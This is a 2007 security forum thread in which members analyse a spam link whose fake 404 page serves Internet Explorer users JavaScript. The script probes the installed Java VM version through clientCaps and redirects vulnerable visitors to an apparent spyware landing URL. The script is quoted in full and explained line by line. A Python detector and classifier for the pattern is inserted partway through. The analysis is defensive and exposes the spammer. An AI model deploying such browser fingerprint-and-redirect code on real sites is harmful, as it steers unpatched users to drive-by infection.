Nikkytas Posted January 10, 2007 Friend of mine tells me about some statistic information available at this page: http:/www.abetterstart.com/c/2000/counter21.php However, every time I hit it, it says 404 error, while my friend gets the content page. I don't think I'm doing anything wrong, but damn... I just can't figure out what can be done to get this page visible :((((
mubix Posted January 10, 2007 (quoting Nikkytas) Friend of mine tells me about some statistic information available at this page: http:/www.abetterstart.com/c/2000/counter21.php However, every time I hit it, it says 404 error, while my friend gets the content page. I don't think I'm doing anything wrong, but damn... I just can't figure out what can be done to get this page visible :(((( I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit.
Sparda Posted January 10, 2007 It's definitely spam, that isn't the server's genuine 404 error. Set your user agent to IE and it returns (what appears to be) a JavaScript exploit for IE, the code is shown below (but not all the code, there is more if you follow the JavaScript URLs, you will eventually end up at this page: http:/www.abetterstart.com/c/2000/counter21.php?j=1, could be an exploit payload):

    <HTML>
    <HEAD>
    <TITLE>404 error - Document Not Found</TITLE>
    </HEAD>
    <STYLE>
    BODY { BEHAVIOR: url(#default#clientCaps) }
    </STYLE>
    <BODY id=testing>
    <script language='javascript'>
    var i,l,v;
    num = 3;
    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
    l = testing.isComponentInstalled(s,'ComponentID');
    v = testing.getComponentVersion(s,'ComponentID');
    if (l == true) {
        x = v.split(',');
        if ( (x[0]!=0) && (x[2]<3810) ) {
            num = 1;
        }
    }
    c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;
    window.location = c;
    </script>
    </BODY>
    </HTML>

Well... this is either spam or the guy asking was smart enough to use Firefox and not get his box owned
mubix Posted January 10, 2007 That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox. I took your URL out as well. I don't want people clicking on it by accident. It's Vako's call if he wants it gone.
Sparda Posted January 10, 2007 So the Java app breaks out of the Java VM?
mubix Posted January 10, 2007 (quoting Sparda) So the Java app breaks out of the Java VM? If you can find out what version of Java 3810 is (3810 is the VM version) then we could start looking for what exploits work against versions lower than it:
mubix Posted January 10, 2007 Code explained:

Initialize JavaScript and declare variables (no big deal):

    <script language='javascript'>
    var i,l,v;
    num = 3;

This is the registry entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets:

    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

You should find it at: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupClsidFeature

Uses a boolean test to verify that the Java component exists:

    l = testing.isComponentInstalled(s,'ComponentID');

Saves the whole value of the registry key to the value 'v':

    v = testing.getComponentVersion(s,'ComponentID');

Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0

This is where it starts checking for what it wants. Is the component installed? If yes, continue:

    if (l == true) {

Split up the 'v' variable using the delimiter ",":

    x = v.split(',');

If there is a version and it is less than 3810 then change "num" to 1:

    if ( (x[0]!=0) && (x[2]<3810) ) { num = 1;

Send the user to a specific site based on the results and value of "num":

    c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;
    window.location = c;

So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1 And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3 again, with the "/" taken out.
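As an added illustration (not code from the thread or from anyone in it), the Python below replicates the branching logic mubix walks through, so a defender can see which component version strings the page would have routed to "?b=1", and adds a small scanner that flags fetched HTML carrying this clientCaps fingerprinting pattern. The sample page and its landing URL are constructed placeholders, not the real spammer's page.

```python
import re

# Constructed sample modelled on the page quoted in the thread; the redirect
# target is a placeholder, only the fingerprinting structure matters here.
SAMPLE_HTML = """<HTML><HEAD><TITLE>404 error - Document Not Found</TITLE></HEAD>
<STYLE> BODY { BEHAVIOR: url(#default#clientCaps) } </STYLE>
<BODY id=testing><script language='javascript'>
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) { x = v.split(','); if ( (x[0]!=0) && (x[2]<3810) ) { num = 1; } }
window.location = 'http://landing-page.invalid/counter.php?b=' + num;
</script></BODY></HTML>"""

# All three must be present: the clientCaps behavior plus both component probes.
FINGERPRINT_MARKERS = (
    r"#default#clientCaps",
    r"\.isComponentInstalled\s*\(",
    r"\.getComponentVersion\s*\(",
)

def _js_number(s):
    """Approximate JavaScript's string-to-number coercion: junk becomes NaN."""
    try:
        return float(s.strip())
    except ValueError:
        return float("nan")

def classify_version(installed, version):
    """Return the 'b' value the script would append for a given component
    version string such as '5,0,3200,0': 1 = routed to the 'vulnerable'
    landing page, 3 = everything else. NaN mirrors JS: NaN != 0 is true,
    NaN < 3810 is false, so a missing or malformed build keeps num at 3."""
    if not installed:
        return 3
    parts = version.split(",")
    major = _js_number(parts[0]) if parts else float("nan")
    build = _js_number(parts[2]) if len(parts) > 2 else float("nan")
    return 1 if (major != 0 and build < 3810) else 3

def is_clientcaps_fingerprint(html):
    """True when a page contains every marker of this fingerprinting pattern."""
    return all(re.search(m, html, re.IGNORECASE) for m in FINGERPRINT_MARKERS)

def extract_clsids(html):
    """Pull out the CLSIDs a fingerprinting page probes, for triage."""
    return re.findall(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", html, re.I)
```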
VaKo Posted January 10, 2007 (quoting mubix) It's Vako's call if he wants it gone. Nope, this is perfect. Instead of idle threats against the spammer, you've actually gone through what it's trying to do. Net result: We all learned a little more and the spammer is exposed.
cooper Posted January 11, 2007 Which version of Java did you have installed on that sandbox? Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away?
mubix Posted January 11, 2007 (quoting cooper) Which version of Java did you have installed on that sandbox? Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away? Google
cooper Posted January 11, 2007 That was the tip I needed. They're testing to see if you're vulnerable to the problem in the JView Profiler which could allow remote code execution. Microsoft Advisory MS05-37: http://www.microsoft.com/technet/security/...n/MS05-037.mspx Secunia Advisory SA15891: http://secunia.com/advisories/15891/ Version 3810 specifically fixes this particular problem, which started out with this: http://www.microsoft.com/technet/security/...ory/903144.mspx The flaw was originally discovered in July 2005, so if you didn't update your system since then... Well, in that case you kinda deserve to get hacked, really.
Sparda Posted January 11, 2007 You don't really need to update Windows for this attack to fail... you just need to not use IE.
mubix Posted January 11, 2007 Yes, but the question is not how many of "US" this attack will fail against. It's how many of our mothers and fathers and grandparents this attack will fail against. How many organizations use IE because of policy, and do not allow installation of Firefox or Opera? Statistics is a scary thing when you start thinking global.